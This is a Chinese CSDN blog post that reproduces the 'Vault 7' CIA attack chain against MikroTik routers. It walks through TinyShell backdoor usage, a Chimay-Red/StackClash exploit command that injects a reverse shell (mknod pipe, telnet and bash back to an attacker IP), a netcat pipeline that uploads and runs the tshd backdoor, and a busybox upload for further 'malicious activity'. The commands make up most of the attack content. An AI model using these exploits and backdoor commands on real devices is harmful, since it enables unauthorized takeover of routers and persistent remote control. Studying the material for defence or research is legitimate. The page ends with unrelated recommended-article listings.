MikroTik路由器攻击场景复现

最新推荐文章于 2024-05-06 12:47:48 发布
最新推荐文章于 2024-05-06 12:47:48 发布
阅读量1k 收藏 5
点赞数 25
文章标签: linux 运维 服务器 python 网络 chrome 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/A345545108/article/details/138256435
版权
使用方法

基于TinyShell项目介绍,梳理TinyShell的使用方法如下:

#******************正向连接******************
#被控端
umask 077; HOME=/var/tmp
./tshd

#控制端
./tsh 192.168.109.200

./tsh 192.168.109.200 get /home/kali/Desktop/1.txt /home/kali/Desktop/

./tsh 192.168.109.200 put /home/kali/Desktop/2.txt /home/kali/Desktop/

#******************反向连接******************
#控制端
./tsh cb

./tsh cb get /home/kali/Desktop/1.txt /home/kali/Desktop/

./tsh cb put /home/kali/Desktop/2.txt /home/kali/Desktop/

#被控端
umask 077; HOME=/var/tmp
./tshd

MikroTik路由器攻击场景复现

参考“Vault 7” CIA泄露文档,梳理CIA组织针对MikroTik路由器的攻击流程如下:

  • 使用Chimay-Red漏洞利用工具上传TinyShell后门
  • 使用TinyShell控制端连接TinyShell后门
    • 运行指令确认是否具有shell权限
  • 上传busybox至MikroTik系统
  • 使用TinyShell控制端连接TinyShell后门
    • 基于busybox程序在MikroTik系统中开展恶意行为

“Vault 7” CIA泄露文档截图如下:

上传并执行TinyShell后门

使用Chimay-Red漏洞利用工具执行如下指令即可实现上传并执行TinyShell后门:

{ echo "echo Uploading..."; hexdump -v -e '"echo -e -n " 1024/1 "\\\\x%02X" " >> /ram/bash\n"' tshd | sed -e "s/\\\\\\\\x  //g";echo "chmod 777 /ram/bash";echo "./ram/bash"; } | nc -l -q 0 -p 2345;


./StackClash_x86.py 192.168.109.200 80 www_binary "/bin/mknod /ram/f p; /bin/telnet 192.168.109.140 2345 < /ram/f | /bin/bash > /ram/f"

相关操作截图如下:

连接TinyShell确认权限

由于TinyShell使用的是正向连接模式,因此直接使用tsh控制端即可连接TinyShell后门:

./tsh 192.168.109.200

相关操作截图如下:

上传busybox

由于MikroTik系统内置的shell指令较少,因此需要上传busybox程序丰富MikroTik系统的shell指令。

使用TinyShell后门的上传文件功能,即可有效上传busybox程序:

./tsh 192.168.109.200 put busybox-i486 /ram/

相关操作截图如下:

连接TinyShell进行远程控制

成功上传busybox程序后,我们即可借助busybox程序中集成的shell指令开展恶意行为活动:

./tsh 192.168.109.200
cd /ram/
chmod 777 busybox-i486
busybox-i486

相关操作截图如下:

海安P海云
关注
  • 25
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
MikroTiK路由器配置PPPoE服务器.docx
05-12
MikroTiK路由器配置PPPoE服务器
MikroTik路由器配置
qq_15509111的博客
10-05 1万+
MikroTik路由器与我们生活常见的国内路由器的配置不一样。 路由器的实物图如下如所示: 配置步骤: 1、下载winbox; 2、使用一根网线,一端接在PC机上面,另外一端接在该路由器上面; 3、按照下面的步骤进入配置环境: 4、按照下面的步骤进行配置: 注: (a)如果出现以下提示框直接点击yes; (b)在步骤2中需要选择“ap home”; ©步骤3设置无线网名称(WIFI SSID); (d)步骤4设置无线网密码,设置的过程中不可见; (e)步骤5选择WAN口连接的方式,一共有静态IP,动
CIA组织MikroTik软路由攻击场景复现及后门加解密剖析
A345545108的博客
04-27 1037
写文章还是有一段时间了,发布的文章也是获得了不少小伙伴的关注,同时也和圈子里面的小伙伴慢慢的建立起了联系,平时也会时不时的一起探讨一些技术问题。因此,在最近和小伙伴的交流学习过程中,有一个小伙伴提到了一款远控工具,名字叫tinyshell:刚听到此远控工具的名字,确实感觉没什么映像,不过尝试在网络中搜索了一下此工具,发现此工具是一款轻量级网络设备后门程序,而且其曾被CIA组织所青睐,配合Chimay Red漏洞利用工具对MikroTik路由器发起攻击
Mikrotik路由器(有线)快速设置教程
热门推荐
EDCwifi的博客
12-03 1万+
Mikroik路由器基础设置教程
计算机网络基础15:MikroTik路由器使用方法
snmplink的博客
03-23 3522
本文介绍MikroTik路由器的使用方法。 一、恢复缺省设置的方法 原文: RouterBOOT reset button has the following functions: 1 Hold the button before pwering on the device, and at power up, the button will force load the backup...
记录mikrotik路由器的折腾过程
chiefoforc的iOS知识管理系统
09-22 3156
折腾的原因是,winbox和web方式莫名其妙的都连不上ROS了,于是首先是重置ros,最简单的方法是戳小屏幕,最下方有reset config选项,code pin默认是1234,输入之后很迅速的就重置重启完成。之后小屏幕提示ether1接口的ip是192.168.88.1 那么电脑网线连上ether1,电脑设置一个静态ip到相同网段,192.168.88.2 掩码自动设置,网关设置,DNS设置好。路由器型号为: ccr1009-8g-1s-1s+
20210130Mikrotik路由器SMB缓冲区溢出漏洞(CVE-2018-7445)复现
qq_45290991的博客
02-01 2316
终于考完了大学最后需要考试的三门课,结果突然间通知不能放假,并且还要封口,那我没办法,只好开始了毕设,老师让先复现几个路由器的漏洞,然后学学《家用路由器0day漏洞》。所以,我们开始吧,我参考了如下几篇博客,间接感谢大佬的智慧: 大纲资料:https://blog.csdn.net/qq_41453285/article/details/102154900 漏洞简述:https://www.coresecurity.com/core-labs/advisories/mikrotik-route...
mikrotik路由器配置手册_家用万兆网络指南 3 - 超静音MikroTik解决方案
weixin_39802814的博客
11-28 908
本期看点:如何挑选 10G 网卡MikroTik 的超魔性热管万兆交换机 交换机如何魔改风扇兼容性问题和故障如何排除注意:因经验和知识有限, 难免文章中会出现错误, 请不吝赐教.好的, 本次是正经教大家如何组建家用万兆局域网的第 2 篇, 我们在上一篇中, 已经给大家介绍了 如何挑选光纤和光模块, 本期我们将介绍如何挑选万兆网卡和万兆交换机. 本篇会给大家介绍最稳妥最少折腾的方案. 当然有得必有失...
调试mikrotik路由器中的程序
q759451733的博客
08-27 816
1. 安装mikrotik时必须使用IDE。 2.将ISO映像设置为如图。 3.启动后输入用户名 admin 密码为空,登录后按a选择全部,再按 i 安装。 4.输入setup,输入 IP地址。 5.用主机ping。 6.再映像16.04版本的Ubuntu Linux。 7.右键虚拟机->电源->打开电源时进入固件。设置成如图所示。 8.在/...
Mikrotik路由器通过Netinstall安装系统
jeremy_kid的博客
10-10 5496
本文旨在针对Mikrotik系列路由器通过Netinstall对系统进行重装,适用于设备忘记密码、进不了系统、高版本系统降低至低版本系统等情况,以下以RB951Ui为例进行讲解。 准备工作:(1)、下载Netinstall及winbox软件。 ( 2)、下载需要安装的系统版本包。 一、操作步骤: ( 1)、打开Netinstall,点击Ne...
mikrotik-distributed-ssh:通过ssh连接到MikroTik路由器并执行命令列表的Python脚本。 库存清单和命令清单均从外部文件加载。 为成功的连接和错误创建单独的日志条目
05-28
这是一个用于从外部commands文件到hosts文件中列出的许多MikroTik路由器执行许多MikroTik命令的工具。 强烈建议使用ssh keys方法! 如果您选择加入该类型的连接,请记住删除所有以明文形式保留的凭据! 根据脚本...
ioBroker.mikrotik:适用于ioBroker的MikroTik路由器适配器
05-07
ioBroker MikroTik路由器适配器 使用 add_firewall 将地址添加到防火墙列表并启用。 例如name,127.0.0.1,comment 。 生的 发送api命令到mikrotik,执行结果将在mikrotik.0.commands.response对象中接收,例如: /ip...
Nuance:Mikrotik路由器的开源计费系统
05-19
细微差别Mikrotik路由器的开源计费系统Nuance计费系统–中小型ISP提供商的计费系统。 它与Mikrotik RouterOS驱动的设备完美配合。 它非常适合通过具有IP + MAC / PPP支持的标准TCP / IP协议连接订户。 特征: 工作快...
MikroTik WinBox ROS路由器管理软件(中文)
10-27
MikroTik WinBox ROS路由器管理软件(中文) RouterOS 软件简介 支持连接管理5.20, 5.22, 5.24版本的ros软路由软件,RouterOS ROS Winbox能够管理软路由接口、以太网,eoip、ip、ger通道等相关信息。 软件功能: 可...
linux下的调试工具gdb的详细使用介绍
最新发布
qq_75270497的博客
05-06 969
详细介绍在linux下使用gdb的方法,每个步骤都举例说明,适合复习和新手入门,希望能为能够帮助到大家。
Linux】开始认识软硬链接
JLX_1的博客
04-29 3323
本文通过对文件系统的总结,讲解了Linux中的软硬链接
Linux 第十八章
一怀明月的博客
05-01 1348
程序地址空间 区间的地址分布 真正理解同一个地址进行读取不同内容 地址空间 虚拟地址和物理地址 虚拟地址: 物理地址: struct mm_struct 页表
Linux的基本指令
道阻且长,行则将至,关注我,和我一起奔赴下一场山海!
05-03 606
先讲基本概念:在Linux当中,它的路径分隔符是斜杠/ Linux当中的文件和目录其实是一棵。可以删文件,但是在删的过程中,系统会给提示时问你确定还是否,如果觉得麻烦,可以直接。05.touch 具体文档格式名(创建一个普通的文件)centos系统中,所有的普通用户都会放在home目录下。大佬的支持和鼓励,将是我成长路上最大的动力。大佬的支持和鼓励,将是我成长路上最大的动力。01.ls指令(查看当前文件下所有列表)可以用来定位当前目录下的一个文件)作用:创建一个普通的文件。04.cd(改变目录)
mikrotik hdcp地址绑定
07-28
MikroTik 路由器可以实现 HDCP(Hardware Device Control Protocol)地址绑定功能,用于将特定的 MAC 地址绑定到指定的 IP 地址。这样可以确保特定设备始终获得相同的 IP 地址,从而实现网络管理和安全控制。您可以...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值